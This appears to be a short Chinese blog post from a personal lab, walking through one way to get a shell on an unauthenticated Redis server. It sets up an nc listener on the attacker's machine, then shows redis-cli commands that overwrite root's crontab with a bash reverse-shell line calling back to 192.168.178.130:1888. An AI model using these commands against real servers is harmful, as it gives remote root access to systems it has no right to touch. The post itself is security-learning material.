Redis未授权访问getshell三种方法 (2、crontab计划任务)

一、

在攻击者服务器上监听一个端口1888(注意该端口是开放的):
我的centos是6.4版本32位的,nc需要安装32位的
https://blog.csdn.net/juexin840/article/details/67635080/
1、卸载不可以用的nc
yum erase nc
2、下载32位nc
wget http://vault.centos.org/6.6/os/i386/Packages/nc-1.84-22.el6.i686.rpm
3、安装nc
rpm -iUv nc-1.84-22.el6.i686.rpm

二、

连接redis,写入反弹shell

redis-cli -h 192.168.178.129

在这里插入图片描述config set dir /var/spool/cron
config set dbfilename root
set xxx “\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.178.130/1888 0>&1\n\n”
save
按理说应该弹回来,但是木有,自闭了一段时间,先放着等我研究一下
收到了!

版权声明:本文为qq_40989258原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。